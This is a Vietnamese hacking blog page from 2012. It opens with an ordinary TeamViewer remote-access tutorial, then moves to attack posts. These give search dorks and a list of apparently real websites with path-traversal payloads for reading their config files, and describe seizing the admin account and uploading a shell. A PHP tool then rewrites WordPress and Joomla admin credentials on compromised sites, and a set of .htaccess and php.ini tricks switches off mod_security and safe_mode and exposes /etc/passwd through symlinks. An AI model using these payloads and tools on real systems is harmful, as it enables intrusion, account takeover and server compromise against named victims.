Social Icons

Thứ Bảy, 28 tháng 7, 2012

Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa


Trong bài viết này chúng tôi hướng dẫn bạn sử dụng TeamViewer cho hai mục đích là truy cập màn hình desktop và lấy file từ máy ở xa.
Trước tiên bạn cần phải mở chương trình TeamViewer ở cả hai máy.
Bạn tải chương trình này tại địa chỉ sau: TeamViewer V5 (2,78MB)
Sau khi tải xong bạn bạn chạy file TeamViewer_Setup.exe vừa download về.
Trong cửa sổ Setup đầu tiên có hai lựa chọn cài đặt (Install) hoặc Run. Nếu nhu cầu sử dụng không thường xuyên thì bạn chọn Run. Bạn cũng có thể chọn Setup để cài vào máy.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Ở đây ta chọn Run, chọn Next.
Trong cửa sổ tiếp theo bạn check vào mục “I accept …” rồi nhấn Next để tiếp tục.
Bước cuối cùng bạn sẽ thấy cửa sổ như trong hình gồm có 2 phần: Wait for session và Create session.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
ID của máy ở xa là: 110 371 768 và pass là 1825 để bảo đảm bảo mật thì thông số này mỗi lần mở TeamViewer là mỗi khác.
Để thực hiện thao tác điều khiển, bạn phải mở đồng thời chương trình tại 2 máy.
Máy bạn đang ngồi ta tạm gọi là máy điều khiển, máy kia ta gọi là máy ở xa (partner).
Để điều khiển được, máy ở xa phải cung cấp ID và pass word cho máy điều khiển.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Máy điều khiển điền ID của máy ở xa vào ô ID trong phần Creat session
Điều khiển Desktop (Remote Desktop)
Ở máy điều khiển bạn điền ID của máy ở xa vào ô ID của phần Create session rồi click Connect to partner. Sau khi nhấn Connect to partner bạn điền mật khẩu của máy ở xa vào ô Password hiện lên.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Bạn điền mật khẩu ở trên vào ô này sau khi click vào nút Connect ....
Sau khi kết nối thành công, bạn sẽ thấy màn hình máy ở xa như sau, bạn có thể thao tác hoàn toàn trên máy đó giống như đang ngồi trên máy mình và có quyền chỉnh xóa tài nguyên trên máy ở xa đó.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Bạn có thể File Transfer trên thanh menu để chuyển đổi file giữa hai máy.
Chức năng này thích hợp cho việc hỗ trợ trực tuyến.
Tuy nhiên, nếu muốn nhờ ai hỗ trợ cho bạn, nhưng không muốn họ can thiệp vào tài nguyên máy tính của mình, họ chỉ có thể "click mẫu" lên lựa chọn, và tại điểm click đó sẽ hiển thị con trỏ to, màu xanh chỉ có tác dụng chỉ dẫn, không có hiệu lực trên máy của bạn thì bạn chọn Presentation.
Truy cập dữ liệu (File Transfer)
Bạn khởi động TeamViewer điền ID vào như trên, thay vì chọn Remote Desktop như trên bạn chọn File Transfer rồi click Connect như trên.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Lúc này chỉ có cửa sổ transfer file hiện lên và bạn thực hiện thao tác transfer file qua lại giữa hai máy như trong Windows.
Để nhận file, bạn chọn file trong cửa sổ Remote Machine, chọn thư mục lưu trữ trong cửa sổ Local Machine rồi nhấn vào nút Receive. Các file, thư mục bạn chọn sẽ được chuyển từ máy ở xa qua máy mình đang ngồi một cách nhanh chóng, tốc độ truyền file cũng tương đối nhanh.
Kinh nghiệm:
- Để thực hiện việc này, TeamViewer trên máy ở xa phải được mở và bạn phải có ID, pass của máy đó.
- Để bảo mật, các bạn phải bảo đảm không tiết lộ ID và pass nên tắt TeamViewer sau khi thực hiện các thao tác.
- Không nên chuyển các file mang tính bảo mật, riêng tư.
readmore...

Thứ Ba, 24 tháng 7, 2012

Đọc Mọi File Không Cần Shell

 DORK :

download.php?file=
down.php?filename=
down.php?file_name=
download.php?src=
download.php?f=

down tưng file 1 về dọc config lấy thống tiin user+pass localhost vào phpMyAdmin chiếm admin up shell

1 Số VD

Mã:
http://www.vpv.vn/download.php?file=
http://www.mcc.edu.vn/download.php?file=../../home.php
http://nobleromancoins.com/down.php?file=
http://www.lelon.com/down.php?f=index.php&n=index.php  
http://www.homeopathyphysician.com/down.php?file=../index.php
http://www.meta-biomed.com/english/e-notice/down.php?Code=e_data&File=../index.php&FileName=index.php
http://www.vienthong360.com/component/download/down.php?filename=../index.php
http://www.jnszjy.net/down.php?file=../index.php&sort=zzgg&realfilename=index.php
http://dhanvantaricollege.org/down.php?file=../index.php 
http://sciencedvine.org/down.php?filename=../index.php
http://www.chinare.gov.cn/table/down.php?file=
http://www.ykjtj.gov.cn/admin/xxgk/down.php?file_name=../../index.php
http://www.elija.org/download.php?src=../mysql_connect.php
http://www.mnda.gov.ng/download.php?f=mndaCmsPanel/classes/DatabaseManager..php
readmore...

Buồn buồn team vào máy victim ngịch chơi

==============================================
sau khi lgoin ta được !




cái này mang tính chất tham khảo !
readmore...

Thứ Hai, 23 tháng 7, 2012

Joomla & Wordpress Login data Changer


HTML Code:
<html dir="ltr">

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>HaCker-1420 - Joomla & Wordpress Login data Changer</title>
<style>

</style>
</head>

<body text="#C0C0C0" bgcolor="#000000" link="#FFFFFF" vlink="#C0C0C0" alink="#FFFFFF">

<div align="center">
 <table border="1" width="98%" id="table1" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td>
   <p align="center"><b><font face=Webdings size=6>!</font><font face=Verdana size=5>HaCker-1420
   - Login Data Changer v1.0</font></b><font face=Webdings size=6><b>!</b></font></td>
  </tr>
 </table>
</div>

<div align="center">
 <table border="1" width="98%" id="table3" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td>
   <p align="center"><b><font face=Webdings size=6>!</font>Powered By 
   HaCker-1420--Dz hacker</b><font face=Webdings size=6><b>!</b></font></td>
  </tr>
 </table>
</div>

<div align="center">
 <table border="1" width="98%" id="table4" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF" height="200">
  <tr>
   <td align="left" width="50%" valign="top">

<div align="center">
 <table border="1" width="100%" id="table5" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td bgcolor="#800000">
   <p align="center"><font color="#FFFFFF"><b>Wordpress Login Changer</b></font></td>
  </tr>
 </table>
</div>
   <p>
         <?
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host     : <br> <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"****\"> <br>
database : <br> <INPUT size=\"15\" value=\"Database\" name=\"database\" type=\"****\"><br>
username : <br> <INPUT size=\"15\" value=\"Username\" name=\"username\" type=\"****\"><br>
password : <br> <INPUT size=\"15\" value=\"password\" name=\"password\" type=\"password\"><br>
      <br>
New username : <br> <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
New password : <br> <INPUT name=\"pwd\" size=\"15\" value=\"admin\"><br>

<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd       = $_POST['pwd'];
$admin     = $_POST['admin'];


         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);

$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());

if($a4s){
echo "<b>root@secure:# ~ Success : U Can Log In Using The New Data - Greetings From HaCker-1420</b> ";
}

}

?>
   
   </td>
   <td align="left" width="50%" valign="top">

<div align="center">
 <table border="1" width="100%" id="table6" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td bgcolor="#800000">
   <p align="center"><font color="#FFFFFF"><b>Joomla Login Changer</b></font></td>
  </tr>
 </table>
</div>
   <p>
   
    <?
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host :<br> <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\"><br>
database :<br> <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><br>
username :<br> <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\"><br>
password :<br> <INPUT size=\"15\" value=\"password\" name=\"password\" type=\"password\"><br>
      <br>
New Username:<br> <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
New Password: Use MD5 Hash or leave that, the new pass will be 123456<br> <INPUT name=\"pwd\" size=\"15\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br>

<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd       = $_POST['pwd'];
$admin     = $_POST['admin'];


         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);

$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 1") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 1") or die(mysql_error());

if($SQL){
echo "<b>root@secure:# ~ Success : U Can Log In Using The New Data - Greetings From HaCker-1420</b> ";
}

}

?>
   
   </td>
  </tr>
 </table>
</div>

<div align="center">
 <table border="1" width="98%" id="table7" dir="ltr" bgcolor="#800000" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF" height="110">
  <tr>
   <td valign="top">
   <p align="center"><b><font color="#FFFFFF">Special Greets To : All 
   <a href="http://www.gaza-hacker.com/cc/"><font color="#000000">Gaza-hacker</font></a> members</font><br>
   <font face="Georgia" color="#FFFFFF">Th3 Viper - !-Bb0yH4cK3r_Dz-!- -- L3b-R1z-  <br> <font size="2">read our news at : 
   </font></font>
   <font face="Georgia" color="#FFFFFF" size="2">
   <font color="#000000">Ozil.Mohamed</font></a></font></b></td>
  </tr>
 </table>
</div>

</body>

</html>
readmore...

.htaccess (đa chức năng)

Sử dụng tùy trường hợp

cgitelnet symlink htaccess

symljnk ghi vào file.hack
download file.hack về

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack


SSI VIEW SYMLJNK
.htaccess

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

ln -s /etc/passwd tyn.txt

tyn.shtml:

<!--#include virtual="tyn.txt" -->

direct symljnk view file.php dưới dạng file text

options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php



Safe mod off

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

or

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

php.ini:

safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off

or

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

VIEW file.php

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

hạ safe_mode
php.ini

safe_mode = Off
disable_functions = ""

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>

.htaccess

AddHandler application/x-httpd-php4 .php .php4 .php3

.htaccess

php_flag safe_mode off
php_flag disable_functions ""

.htaccess

php_admin_value disable_functions ""
php_admin_value safe_mode off

.htaccess

php_value safe_mode off
php_value disable_functions ""

.htaccess

SetEnv PHPRC /home/user/public_html/php.ini

.htaccess

suPHP_ConfigPath /home/user/public_html/php.ini

.htaccess

<Files *.php>
ForceType application/x-httpd-php4
</Files>
readmore...